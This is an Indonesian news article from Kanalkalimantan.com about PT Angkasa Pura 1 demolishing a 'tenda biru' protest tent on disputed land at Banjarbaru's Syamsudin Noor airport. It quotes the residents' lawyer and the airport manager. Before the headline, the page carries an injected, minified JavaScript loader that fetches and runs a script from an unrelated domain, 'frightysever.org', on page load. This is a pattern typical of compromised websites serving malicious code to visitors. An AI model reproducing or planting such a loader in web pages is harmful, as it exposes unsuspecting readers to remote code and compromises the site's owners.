(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Dikawal 250 Personil Gabungan, PT Angkasa Pura Gusur “Tenda Biru”


BANJARBARU,  Demi mengejar target pembangunan Bandara Syamsudin Noor, PT Angkasa Pura 1, akhirnya menggusur bangunan ‘tenda biru’ di atas lahan yang ditempati keluarga Muhammad bin Abdurauf.  Dikawal 250 personil gabungan dari Polisi, TNI, dan Satpol PP,  tenda perjuangan itu pun akhirnya dibongkar, dan enam orang warga yang menempati bangunan alakadarnya itu dibawa ke kantor pengacaranya.

Proses pengusuran atas ‘tenda biru’ tersebut digelar Kamis (25/1) sekitar pukul 09.30 Wita. Pihak PT Angkasa Pura 1 didampingi Polres Banjarbaru, turut melakukan mediasi kepada enam warga penguni gubuk tersebut, yakni Muhammad bin Abdulrauf, Hadar, Yansyah, Yunani, Antung Burhan, dan Arsad. Selama ini, mereka bertahan dan enggan meninggalkan lahan seluas 7,9 hektare di lokasi perluasan pembangunan Bandara Syamsudin Noor, karena belum mendapatkan ganti rugi.

Dan tadi, ‘tenda biru’ yang telah dihuni selama hampir sembilan bulan tersebut akhirnya dibongkar.

Menurut Hadar, pihaknya sebenarnya tetap bersikeras menolak untuk meninggalkan lahan tersebut sebelum hak-hak mereka terpenuhi.  Karena belum ada kata sepakat, proses negosiasi yang dilakukan di bawah tenda itu pun tanpa titik temu. Perdebatan terjadi sekitar 1 jam, akhirnya pihak kepolisian membawa enam warga ke mobil dan akan diantar ke rumah mereka masing masing. Namun mereka menolak, sampai akhirnya pengacara mereka, Samsul menelepon untuk agar keenam warga tersebut dibawa ke rumahnya.

Kuasa Hukum keluarga Abdurrauf, Samsul Hidayat SH, MH, menyebutkan, tindakan penertiban yang dilakukan PT Angkasa Pura 1 dengan didampingi ratusan personil gabungan tersebut, dianggap sebagai tindakan perampasan terhadap hak kliennya.

Menurutnya, tindakan hari ini adalah perbuatan melawan hukum. Karena tidak ada surat perintah dari pengadilan ataupun annmaning untuk ditunjukkan kepada pemilik tanah sejatinya.  Pihak Angkasa Pura 1, menurut Samsul, juga belum pernah memberikan surat pemberitahuan terkait kegiatan seperti hari ini, atau surat lainnya apapun sebutannya. (Lihat: Video Negosiasi PT Angkasa Pura dengan Penghuni ‘Tenda Biru’).

Terkait hal ini, Samsul memastikan pihaknya dan keluarga Abdurrauf akan mengambil langkah hukum atas upaya bongkar paksa ‘tenda biru’ yang ditempati enam kliennya.

“Hal ini merugikan klien kami ini, dengan hal ini kami akan mengambil langkah-langkah hukum yang jelas baik secara perdata atau pidana,” katanya kepada Kanalkalimantan.com.

Di sisi lain, pasca penggusuran ‘tenda biru’ yang ditempati keluarga Abdurrauf, pihak PT Angkasa Pura 1 Syamsudin Noor menggelar pers conference di bandara, pukul 11.00 Wita. General Manager PT Angkasa Pura 1, Wahyudi mengatakan, pihaknya sudah membayar seluruh lahan masyarakat sesuai data kepemilikan yang telah diinventariskan dan diverifikasi oleh Panitia Pengadaan Tanah (P2T) Banjarbaru secara tunai. Dan sebagian lagi dititipkan di Pengadilan Negeri (PN) Banjarbaru melalui mekanisme konsignasi.


Page: 1 2

Desy Arfianty

Recent Posts

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

28 menit ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

38 menit ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

50 menit ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

5 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

7 jam ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

8 jam ago

This website uses cookies.